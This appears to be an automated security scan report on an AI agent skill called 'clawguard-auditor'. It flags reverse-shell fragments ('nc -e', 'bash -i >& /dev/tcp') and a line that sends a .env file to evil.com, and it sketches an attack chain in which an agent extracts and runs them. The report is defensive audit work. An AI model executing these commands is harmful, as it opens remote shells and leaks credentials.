Scan Report
42 /100
clawguard-auditor
Enterprise-grade Security Kernel, SAST Vetter, and Active DLP Engine for OpenClaw
Security auditor skill contains embedded reverse shell patterns (nc -e, bash -i >& /dev/tcp) and data exfiltration examples (evil.com/?data=$(cat .env)) within documentation. No executable code files present, but the skill specification describes extensive capabilities (filesystem:WRITE, network:READ, shell:ADMIN) without implementation.
Use with caution
Do not install this skill. The documentation contains dangerous pattern examples that could be extracted by a compromised AI agent, and the skill describes capabilities far exceeding what documentation-only implementation requires.
Attack Chain 4 steps
◎
Entry Skill masquerades as legitimate security auditor
SKILL.md:1⬡
Escalation Documentation embeds reverse shell patterns as 'detection examples'
SKILL.md:55⬡
Escalation AI agent extracts and interprets embedded patterns during skill processing
SKILL.md:55◉
Impact Potential execution of nc -e /dev/tcp or bash reverse shell commands
SKILL.md:55Findings 4 items
| Severity | Finding | Location |
|---|---|---|
| High | Embedded reverse shell command patterns | SKILL.md:55 |
| Medium | Data exfiltration pattern example | SKILL.md:99 |
| Medium | Capabilities exceed implementation | SKILL.md:25 |
| Low | Documentation-only implementation | SKILL.md:1 |
| Resource | Declared | Inferred | Status | Evidence |
|---|---|---|---|---|
| Filesystem | WRITE | NONE | ✓ Aligned | SKILL.md describes CAP_FS_WRITE capability but no code exists to exercise it |
| Network | READ | NONE | ✓ Aligned | SKILL.md describes NET_EGRESS token but no network code present |
| Shell | ADMIN | NONE | ✓ Aligned | No shell scripts or subprocess calls in any file |
| Environment | READ | NONE | ✓ Aligned | Mentions credential access but no code implements it |
2 Critical 3 findings
Critical Dangerous Command 危险 Shell 命令
nc -e SKILL.md:55 Critical Dangerous Command 危险 Shell 命令
bash -i >& SKILL.md:55 Medium External URL 外部 URL
http://evil.com/?data=$(cat SKILL.md:99 File Tree
3 files · 13.8 KB · 271 lines Markdown 2f · 263L
JSON 1f · 8L
├─
_meta.json
JSON
├─
README.md
Markdown
└─
SKILL.md
Markdown
Security Positives
✓ No executable scripts or binary files present
✓ No actual network connections or data exfiltration attempted
✓ No credential harvesting code implemented
✓ No base64-encoded payloads or obfuscated code
✓ Patterns appear in documented 'detection examples' context rather than as instructions